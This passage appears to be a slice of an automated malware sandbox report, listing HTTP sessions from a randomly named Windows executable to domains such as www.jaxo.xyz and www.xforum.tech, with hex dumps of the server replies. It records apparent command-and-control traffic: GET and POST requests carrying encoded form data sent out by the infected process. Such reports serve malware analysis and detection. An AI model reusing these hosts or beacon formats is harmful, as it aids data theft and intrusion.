                      Data Ascii: Xn70_=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QF3RXB+cpXyq1gpamjWZmeUgR8eaUvgv+cJGkKeSp0Te/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcdhPrpaBCTjFC9nHEbGmGgyLE4CzIJKIMyt8my8iTnz9ppRchw1qazghyfJyUAoSqFxMx8n7IFN4rvJtNZdbuc4SWsjornsUdAfcSLJ5sA0WSJ3JZwmFWiq6+be35XV4ld12R3ubZHYMMD0/F6EB+2hW0Mhm4HN/Up43aR5+NFlNJULOYpWAGxZGp9IRFFEEmGCAJjCJ6MO22BGi9xii8q7M/+ENounBq+a2OaAOL3RgYRRvLlv9EzdE1O6bTbnIrMxpvTO6T7z8NnIAPucVxIKW5aX2YxVypA8yNXp9Wt8ilfGb1DBFUZN4PM/WZC+2rosto4Trs1c1Nn/u1C/fI78nY7iNY40A1W1CUuPMWyG1QIPtVwDMIxfWwi3tyXrYbDssWqCWBw41kbPL+KeY2Mc4Q9C8ap8FYMUdl7Wua5p06f6aUuYT8M1uHkAmzifsu++lbmcfMoGE4KFiKnujLaRvUShbkRugDxmdtUrolHnCCCc9IlHiNsTqe4PGoHrqglUNDf3V8fXZYcHtI50A/ox4X7VUZr6U9U12rmqIM0JeqIP9Iq+unTKLudZXIkEA89ZkqC3DCa44AaQ2Sq1pnhhYzhYPEVC3alPelxSXqOy04f9AAs3aMi4a3DgL/bpnY94ppBqfkgKD3Nv0ZRyOFaQSdi3d1sd01Hph4XAWca9y0fKh9gI1bc/NN5fxvrdVt9sTWaWctiOpr2AozjGj7P7RcEShF0V9jNtsCdXTP3U5VbzoDzJn0 [TRUNCATED]
                      Aug 23, 2024 08:27:09.524092913 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:09 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                      Aug 23, 2024 08:27:09.524115086 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                      Aug 23, 2024 08:27:09.524127007 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                      Aug 23, 2024 08:27:09.524169922 CEST1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                      Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                      Aug 23, 2024 08:27:09.524180889 CEST896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                      Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                      Aug 23, 2024 08:27:09.524188042 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                      Aug 23, 2024 08:27:09.524198055 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                      Aug 23, 2024 08:27:09.524204016 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                      Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                      Aug 23, 2024 08:27:09.524317980 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                      Aug 23, 2024 08:27:09.524379015 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
                      Aug 23, 2024 08:27:09.529269934 CEST1236INData Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
                      Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.64974166.29.149.180806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:11.462482929 CEST499OUTGET /f9bc/?Xn70_=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:12.252274036 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:11 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                      Aug 23, 2024 08:27:12.252316952 CEST1236INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                      Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                      Aug 23, 2024 08:27:12.252322912 CEST448INData Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                      Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                      Aug 23, 2024 08:27:12.252348900 CEST1236INData Raw: 31 30 32 2d 31 31 34 2e 39 20 31 38 2e 31 39 34 2d 35 35 2e 35 34 32 20 31 39 2e 38 38 34 2d 31 31 32 2e 31 35 37 20 33 36 2e 34 39 2d 31 36 37 2e 38 34 39 20 35 35 2e 39 36 33 2d 32 30 2e 38 31 20 37 2e 32 37 35 2d 34 34 2e 39 31 20 31 38 2e 36
                      Data Ascii: 102-114.9 18.194-55.542 19.884-112.157 36.49-167.849 55.963-20.81 7.275-44.91 18.606-48.766 41.922z"/> </defs> <g fill="none" fill-rule="evenodd"> <path fill="#FFF" d="M0 0H1366V800H0z" transform="translate(-448 -157)"/>
                      Aug 23, 2024 08:27:12.252353907 CEST1236INData Raw: 2e 39 34 38 2d 32 2e 37 36 39 20 31 30 2e 35 30 37 2d 33 2e 31 39 36 20 32 2e 35 35 38 2d 33 34 2e 38 30 35 20 32 33 2e 35 32 36 2d 39 39 2e 35 34 20 31 32 2e 33 37 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31
                      Data Ascii: .948-2.769 10.507-3.196 2.558-34.805 23.526-99.54 12.379" transform="translate(161 68)"/> <path fill="#FFDA7F" d="M5.679 131.837c-6.522 1.646-.275 6.91 9.492 12.14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 5
                      Aug 23, 2024 08:27:12.252363920 CEST448INData Raw: 39 2e 30 31 36 63 2d 2e 36 39 34 2e 31 33 2d 31 2e 34 34 36 2e 36 31 2d 31 2e 37 37 34 20 31 2e 30 39 38 2d 2e 31 36 38 2e 32 34 38 2d 2e 33 2e 35 31 32 2d 2e 33 31 37 2e 37 39 32 2d 2e 30 31 37 2e 33 31 33 2e 31 35 34 2e 35 30 33 2e 32 39 2e 37
                      Data Ascii: 9.016c-.694.13-1.446.61-1.774 1.098-.168.248-.3.512-.317.792-.017.313.154.503.29.776.249.494 1.245.392 1.22-.162-.014-.274.33-.612.54-.817.367-.361.75-.62.923-1.075.154-.404-.413-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.0
                      Aug 23, 2024 08:27:12.252370119 CEST1236INData Raw: 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d
                      Data Ascii: 86-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.5
                      Aug 23, 2024 08:27:12.252376080 CEST224INData Raw: 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d
                      Data Ascii: 1.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.3
                      Aug 23, 2024 08:27:12.252412081 CEST1236INData Raw: 32 35 2e 31 36 38 2e 31 32 38 2e 33 33 36 2e 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35
                      Data Ascii: 25.168.128.336.247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.05
                      Aug 23, 2024 08:27:12.252415895 CEST224INData Raw: 34 39 37 2e 30 37 31 2d 2e 37 2e 33 36 33 2d 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e
                      Data Ascii: 497.071-.7.363-1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-
                      Aug 23, 2024 08:27:12.258888006 CEST1236INData Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
                      Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.649742103.224.182.242806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:17.762106895 CEST751OUTPOST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 4a 79 44 70 76 34 4b 6d 43 66 71 65 62 38 2f 6d 68 63 6b 50 65 30 6f 7a 59 78 68 53 33 70 4f 54 74 64 79 56 73 45 4b 59 43 76 4a
                      Data Ascii: Xn70_=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlJyDpv4KmCfqeb8/mhckPe0ozYxhS3pOTtdyVsEKYCvJ
                      Aug 23, 2024 08:27:18.331600904 CEST872INHTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:18 GMT
                      server: Apache
                      set-cookie: __tad=1724394438.1131553; expires=Mon, 21-Aug-2034 06:27:18 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.649743103.224.182.242806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:20.315664053 CEST775OUTPOST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
